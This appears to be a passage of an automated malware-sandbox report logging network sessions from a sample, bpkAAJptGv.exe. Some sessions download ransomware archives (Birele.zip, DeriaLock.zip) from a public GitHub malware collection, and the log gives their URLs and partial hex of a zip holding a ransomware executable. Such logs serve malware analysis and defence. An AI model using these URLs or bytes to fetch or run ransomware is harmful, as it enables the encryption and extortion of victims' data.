                                                                                                                                                            2022-09-29 12:46:21 UTC38508INData Raw: 67 ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46 35
                                                                                                                                                            Data Ascii: g?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF5
                                                                                                                                                            2022-09-29 12:46:21 UTC38517INData Raw: 89 d9 04 7b 1a 72 5f 70 e3 b9 d5 f4 a1 e0 04 fd 95 77 63 91 53 e4 07 43 2b 28 85 21 97 46 c6 4e 21 82 14 4c 3a af 50 52 7b ed 80 ef ab ad a4 42 8e e0 fb c5 cc ff 0f b5 56 59 aa 74 3e 4e 4b 8b c1 a5 63 71 55 98 97 e1 ad 42 09 81 13 e8 a0 2c 1f b1 fd 02 2c 91 d3 9a fd 45 25 05 f5 3a b0 b2 d0 85 bf 9a 7d 81 22 e3 dc ee 3f 7d c1 4e c2 96 88 ae f6 b7 c9 ca 38 5b a5 c4 49 e8 d0 88 31 d7 7f 83 20 46 34 c9 c5 c6 63 f8 10 de 16 e2 b0 76 4e eb 90 e5 04 67 52 df 26 ae 47 23 d0 61 26 b4 60 f0 9a 52 00 8f bd 23 9f 09 38 74 16 b8 56 c2 d9 2a 02 42 cd 0c b4 9d ba 3d 01 5e 73 f8 c5 38 09 bd c7 8e bb 45 60 fa 4b af 5a 35 a5 89 e0 30 af c6 61 19 96 c4 7a 5a ef cd 4c da b2 87 4d dd 35 bf 42 5d fc de 42 e1 71 df 14 05 6b ff 2c f8 84 cc 43 1c ce 06 50 3f dd ba 0d 2c 81 44 20
                                                                                                                                                            Data Ascii: {r_pwcSC+(!FN!L:PR{BVYt>NKcqUB,,E%:}"?}N8[I1 F4cvNgR&G#a&`R#8tV*B=^s8E`KZ50azZLM5B]Bqk,CP?,D


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            145192.168.2.64980020.190.159.74443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:22 UTC38518OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                            Content-Length: 4740
                                                                                                                                                            Host: login.live.com
                                                                                                                                                            2022-09-29 12:46:22 UTC38518OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                            2022-09-29 12:46:23 UTC38523INHTTP/1.1 200 OK
                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:45:23 GMT
                                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                            x-ms-route-info: R3_BL2
                                                                                                                                                            x-ms-request-id: 21c4be74-1cb5-4b17-b58a-18a6a2301272
                                                                                                                                                            PPServer: PPV: 30 H: BL02PF2434F9C50 V: 0
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:22 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 11300
                                                                                                                                                            2022-09-29 12:46:23 UTC38523INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            146192.168.2.64980920.190.159.74443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:23 UTC38534OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/soap+xml
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                            Content-Length: 4682
                                                                                                                                                            Host: login.live.com
                                                                                                                                                            2022-09-29 12:46:23 UTC38535OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                            2022-09-29 12:46:23 UTC38539INHTTP/1.1 200 OK
                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:45:23 GMT
                                                                                                                                                            P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                            x-ms-route-info: R3_BL2
                                                                                                                                                            x-ms-request-id: de2f66d7-153c-439c-bf6b-3094d9a4b0e2
                                                                                                                                                            PPServer: PPV: 30 H: BL02PF4BF2C00DD V: 0
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:23 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 10857
                                                                                                                                                            2022-09-29 12:46:23 UTC38540INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            147192.168.2.64981020.189.173.20443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:25 UTC38550OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: MSDW
                                                                                                                                                            MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAcPkwu5CuAB7SMBMSR0vg4T2GTS736uQgZubBU70HwG+3eCDoCG4GUM8sTsgEBWu3nY3OtYeS4vzBd8BfrRg6yTBJpfLJjVhq6RpmRjIeeXuvrNOQr4a7wekuEm1aJWEsa4Pc+hZQ6fZaRBbOQsOVNRIqNVE8z9M1agLY9OcqvuEiDf//52Usd04foxLkWDFM80/1MM3M9wm0fC2sMtlRfy9Ue1IXWTUZXxpDsAc9WU97zBc19rHNDaxcZx1tSb/4XgmU9MUbgs1P8Qx6IelPdLjVy6vPJO+w4qkm2ENvWoNim3llQsv7LYevPNeYEBGMEsFMS1J+lLt+ZBQ/Hb+j7gDZgAACNk64fIdJpuXiAHCgAEWhQzyBn3+QDBdXX5NhaVxezC6TMcsfJefJLmfMIT3USPrihuwpRXekBx90tw4/fxdtAJX5VCFrinVPSPU6v7h/UBkETTfEgWc9YERODxnZvi/zpyJWFL1b9MTYTccha+VPv30gT9w85kxi7Jc0eKOEl+1wYWAhRnVINRSgK/mNlsVDRqcxsKrE0OpLt9K5EJigzDdhF8oM0ASLhkSDZTk3Xczz+xIUGLjAtVmYKvsePuE3jU6qNyNWGgIxJnUPdQZ58wnoBemECWLsa4hi2OBya5LqElwkPAzn8AEBaz61HrlFQsB8Oit8+pOGLQnjFp2PGpi7cqYHg6YkjHvzdu+/YD2maMJsolZPZTi4OzkN8C4EwCSQzC1g37gcT1ctrND2wl0tT9s4Bg+kGgLVVOOwoQscbl+Qlw8n6TyyimxMO4F9eX/bXyTSj7EoBX3dOzT5uIvoESsADRjr2FcezrZKIY0c5WzVg1qTbE0hrgBj2NchP7lSR2jX9USydn2qQqIuZQhpLgB&p=
                                                                                                                                                            Content-Length: 4664
                                                                                                                                                            Host: watson.telemetry.microsoft.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            148192.168.2.64981320.189.173.21443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:35 UTC38551OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: MSDW
                                                                                                                                                            MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAcPkwu5CuAB7SMBMSR0vg4T2GTS736uQgZubBU70HwG+3eCDoCG4GUM8sTsgEBWu3nY3OtYeS4vzBd8BfrRg6yTBJpfLJjVhq6RpmRjIeeXuvrNOQr4a7wekuEm1aJWEsa4Pc+hZQ6fZaRBbOQsOVNRIqNVE8z9M1agLY9OcqvuEiDf//52Usd04foxLkWDFM80/1MM3M9wm0fC2sMtlRfy9Ue1IXWTUZXxpDsAc9WU97zBc19rHNDaxcZx1tSb/4XgmU9MUbgs1P8Qx6IelPdLjVy6vPJO+w4qkm2ENvWoNim3llQsv7LYevPNeYEBGMEsFMS1J+lLt+ZBQ/Hb+j7gDZgAACNk64fIdJpuXiAHCgAEWhQzyBn3+QDBdXX5NhaVxezC6TMcsfJefJLmfMIT3USPrihuwpRXekBx90tw4/fxdtAJX5VCFrinVPSPU6v7h/UBkETTfEgWc9YERODxnZvi/zpyJWFL1b9MTYTccha+VPv30gT9w85kxi7Jc0eKOEl+1wYWAhRnVINRSgK/mNlsVDRqcxsKrE0OpLt9K5EJigzDdhF8oM0ASLhkSDZTk3Xczz+xIUGLjAtVmYKvsePuE3jU6qNyNWGgIxJnUPdQZ58wnoBemECWLsa4hi2OBya5LqElwkPAzn8AEBaz61HrlFQsB8Oit8+pOGLQnjFp2PGpi7cqYHg6YkjHvzdu+/YD2maMJsolZPZTi4OzkN8C4EwCSQzC1g37gcT1ctrND2wl0tT9s4Bg+kGgLVVOOwoQscbl+Qlw8n6TyyimxMO4F9eX/bXyTSj7EoBX3dOzT5uIvoESsADRjr2FcezrZKIY0c5WzVg1qTbE0hrgBj2NchP7lSR2jX9USydn2qQqIuZQhpLgB&p=
                                                                                                                                                            Content-Length: 4626
                                                                                                                                                            Host: watson.telemetry.microsoft.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            149192.168.2.649844140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:57 UTC38553OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            15140.82.121.4443192.168.2.649715C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC699INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:08 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:48 UTC700INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            150140.82.121.3443192.168.2.649844C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:57 UTC38553INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:46:57 UTC38553INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            151192.168.2.649845185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:57 UTC38555OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            152185.199.108.133443192.168.2.649845C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:46:57 UTC38555INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 116134
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:46:57 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6959-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455618.909215,VS0,VE2
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 242f632c826c8317f3c10f8f6c13694cad0083ce
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:51:57 GMT
                                                                                                                                                            Source-Age: 178
                                                                                                                                                            2022-09-29 12:46:57 UTC38556INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                                                                            Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                                                                            2022-09-29 12:46:57 UTC38572INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                                                                            Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
